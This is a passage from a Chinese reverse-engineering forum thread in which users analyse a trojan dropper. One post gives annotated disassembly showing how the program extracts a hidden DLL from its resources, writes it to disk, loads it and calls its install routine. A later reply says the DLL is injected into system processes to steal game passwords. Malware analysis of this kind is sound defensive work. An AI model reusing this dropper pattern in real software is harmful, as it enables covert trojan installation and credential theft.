能力值:
( LV2,RANK:10 )
|
-
-
2 楼
安装一个dll文件..
重要的 应该在这里面
|
能力值:
( LV2,RANK:10 )
|
-
-
3 楼
能告知是什么壳吗
|
能力值:
( LV9,RANK:3410 )
|
-
-
4 楼
比较忙,简单看了一下,主exe无壳。
exe运行后释放隐藏在资源中的木马DLL,加载dll使其运作
.RIF1:00401230 ; =============== S U B R O U T I N E ?=====================================
.RIF1:00401230
.RIF1:00401230
.RIF1:00401230 public start
.RIF1:00401230 start proc near
.RIF1:00401230
.RIF1:00401230 LibFileName= byte ptr -108h
.RIF1:00401230
.RIF1:00401230 sub esp, 108h
.RIF1:00401236 lea eax, [esp+108h+LibFileName]
.RIF1:0040123A push esi
.RIF1:0040123B push eax
.RIF1:0040123C call sub_401360
//释放藏在资源中的winhtm.dll
.RIF1:0040123C
.RIF1:00401241 add esp, 4
.RIF1:00401244 test eax, eax
.RIF1:00401246 jz short loc_40127A
.RIF1:00401246
.RIF1:00401248 lea ecx, [esp+10Ch+LibFileName]
.RIF1:0040124C push ecx ; lpLibFileName
.RIF1:0040124D call LoadLibraryA
//载入木马DLL(winhtm.dll)
.RIF1:0040124D
.RIF1:00401253 mov esi, eax
.RIF1:00401255 test esi, esi
.RIF1:00401257 jz short loc_40127A
.RIF1:00401257
.RIF1:00401259 push offset ProcName ; "InstallServerEx"
.RIF1:0040125E push esi ; hModule
.RIF1:0040125F call GetProcAddress
//获取木马DLL的InstallServerEx导出函数地址
.RIF1:0040125F
.RIF1:00401265 test eax, eax
.RIF1:00401267 jz short loc_401273
.RIF1:00401267
.RIF1:00401269 lea edx, [esp+10Ch+LibFileName]
.RIF1:0040126D push edx
.RIF1:0040126E call eax
//Call InstallServerEx 木马开始工作
//木马如何运作,自己去分析winhtm.dll
.RIF1:0040126E
.RIF1:00401270 add esp, 4
.RIF1:00401273
.RIF1:00401273 loc_401273: ; CODE XREF: start+37j
.RIF1:00401273 push esi ; hLibModule
.RIF1:00401274 call FreeLibrary
//安装木马后就可以释放winhtm.dll
.RIF1:00401274
.RIF1:0040127A
.RIF1:0040127A loc_40127A: ; CODE XREF: start+16j
.RIF1:0040127A ; start+27j
.RIF1:0040127A push 0 ; uExitCode
.RIF1:0040127C call ExitProcess
//Game Over
.RIF1:0040127C
.RIF1:00401282 xor eax, eax
.RIF1:00401284 pop esi
.RIF1:00401285 add esp, 108h
.RIF1:0040128B retn 10h
.RIF1:0040128B
.RIF1:0040128B start endp
你可以用16进制编辑工具打开此文件,偏移00002000处就是捆绑的winhtm.dll
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00002000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ?........?..
00002010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ?......@.......
00002020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00002030 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 00 00 ............?..
00002040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ..?.???L?Th
00002050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
00002060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
00002070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
.RIF1:0040143C lea ecx, [esp+220h+FileName]
.RIF1:00401440 push ecx ; lpFileName
.RIF1:00401441 call sub_401290
.RIF1:00401290 ; =============== S U B R O U T I N E ?=====================================
.RIF1:00401290
.RIF1:00401290
.RIF1:00401290 ; int __cdecl sub_401290(LPCSTR lpFileName)
.RIF1:00401290 sub_401290 proc near ; CODE XREF: sub_401360+E1p
.RIF1:00401290
.RIF1:00401290 NumberOfBytesWritten= dword ptr -4
.RIF1:00401290 lpFileName= dword ptr 4
.RIF1:00401290
.RIF1:00401290 push ecx
.RIF1:00401291 push ebx
.RIF1:00401292 push ebp
.RIF1:00401293 push esi
.RIF1:00401294 push edi
.RIF1:00401295 mov edi, GetModuleHandleA
.RIF1:0040129B push 100h ; lpType
.RIF1:004012A0 push 64h ; lpName
.RIF1:004012A2 push 0 ; lpModuleName
.RIF1:004012A4 call edi ; GetModuleHandleA
.RIF1:004012A4
.RIF1:004012A6 push eax ; hModule
.RIF1:004012A7 call FindResourceA
.RIF1:004012A7
.RIF1:004012AD mov esi, eax
.RIF1:004012AF push esi ; hResInfo
.RIF1:004012B0 push 0 ; lpModuleName
.RIF1:004012B2 call edi ; GetModuleHandleA
.RIF1:004012B2
.RIF1:004012B4 push eax ; hModule
.RIF1:004012B5 call LoadResource
//资源载入内存00402000处
.RIF1:004012B5
.RIF1:004012BB test esi, esi
.RIF1:004012BD mov ebp, eax
.RIF1:004012BF jnz short loc_4012C9
.RIF1:004012BF
.RIF1:004012C1 pop edi
.RIF1:004012C2 pop esi
.RIF1:004012C3 pop ebp
.RIF1:004012C4 xor eax, eax
.RIF1:004012C6 pop ebx
.RIF1:004012C7 pop ecx
.RIF1:004012C8 retn
.RIF1:004012C8
.RIF1:004012DE ; ---------------------------------------------------------------------------
.RIF1:004012DE
.RIF1:004012DE loc_4012DE: ; CODE XREF: sub_401290+44j
.RIF1:004012DE push esi ; hResInfo
.RIF1:004012DF push 0 ; lpModuleName
.RIF1:004012E1 call edi ; GetModuleHandleA
.RIF1:004012E1
.RIF1:004012E3 push eax ; hModule
.RIF1:004012E4 call SizeofResource
.RIF1:004012E4
.RIF1:004012EA mov ebp, eax
.RIF1:004012EC mov eax, dword_401000
.RIF1:004012F1 lea edi, [eax+ebx]
.RIF1:004012F4 call sub_4011C0
.RIF1:004012F4
.RIF1:004012F9 mov ecx, [esp+14h+lpFileName]
.RIF1:004012FD push 0 ; hTemplateFile
.RIF1:004012FF push 80h ; dwFlagsAndAttributes
.RIF1:00401304 push 2 ; dwCreationDisposition
.RIF1:00401306 push 0 ; lpSecurityAttributes
.RIF1:00401308 push 0 ; dwShareMode
.RIF1:0040130A push 40000000h ; dwDesiredAccess
.RIF1:0040130F push ecx ; lpFileName
.RIF1:00401310 mov [edi+1C2h], eax
.RIF1:00401316 call CreateFileA
//在临时目录下生成和主程序同名的dll文件
.RIF1:00401316
.RIF1:0040131C mov esi, eax
.RIF1:0040131E cmp esi, 0FFFFFFFFh
.RIF1:00401321 jnz short loc_40132B
.RIF1:00401321
.RIF1:00401323 pop edi
.RIF1:00401324 pop esi
.RIF1:00401325 pop ebp
.RIF1:00401326 xor eax, eax
.RIF1:00401328 pop ebx
.RIF1:00401329 pop ecx
.RIF1:0040132A retn
.RIF1:0040132A
.RIF1:0040132B ; ---------------------------------------------------------------------------
.RIF1:0040132B
.RIF1:0040132B loc_40132B: ; CODE XREF: sub_401290+91j
.RIF1:0040132B lea edx, [esp+14h+NumberOfBytesWritten]
.RIF1:0040132F push 0 ; lpOverlapped
.RIF1:00401331 push edx ; lpNumberOfBytesWritten
.RIF1:00401332 push ebp ; nNumberOfBytesToWrite
.RIF1:00401333 push ebx ; lpBuffer
.RIF1:00401334 mov ebx, WriteFile
.RIF1:0040133A push esi ; hFile
.RIF1:0040133B call ebx ; WriteFile
.RIF1:0040133B
.RIF1:0040133D lea eax, [esp+14h+NumberOfBytesWritten]
.RIF1:00401341 push 0 ; lpOverlapped
.RIF1:00401343 push eax ; lpNumberOfBytesWritten
.RIF1:00401344 push 6F4h ; nNumberOfBytesToWrite
.RIF1:00401349 push edi ; lpBuffer
.RIF1:0040134A push esi ; hFile
.RIF1:0040134B call ebx ; WriteFile
.RIF1:0040134B
.RIF1:0040134D push esi ; hObject
.RIF1:0040134E call CloseHandle
.RIF1:0040134E
.RIF1:00401354 pop edi
.RIF1:00401355 pop esi
.RIF1:00401356 pop ebp
.RIF1:00401357 mov eax, 1
.RIF1:0040135C pop ebx
.RIF1:0040135D pop ecx
.RIF1:0040135E retn
.RIF1:0040135E
.RIF1:0040135E sub_401290 endp
|
能力值:
( LV2,RANK:10 )
|
-
-
5 楼
谢fly!
|
能力值:
( LV2,RANK:10 )
|
-
-
6 楼
程序运行以后,会在TEMP目录里生成TEST1.DLL这个文件,然后把TEST1.DLL远程注入到EXPLORER,SVCHOST的进程中
应该是个偷天堂密码的木马!
|
能力值:
( LV2,RANK:10 )
|
-
-
7 楼
fly分析得很仔细呀,我菜鸟都看懂了
|
能力值:
( LV3,RANK:20 )
|
-
-
8 楼
楼上的好熟啊
|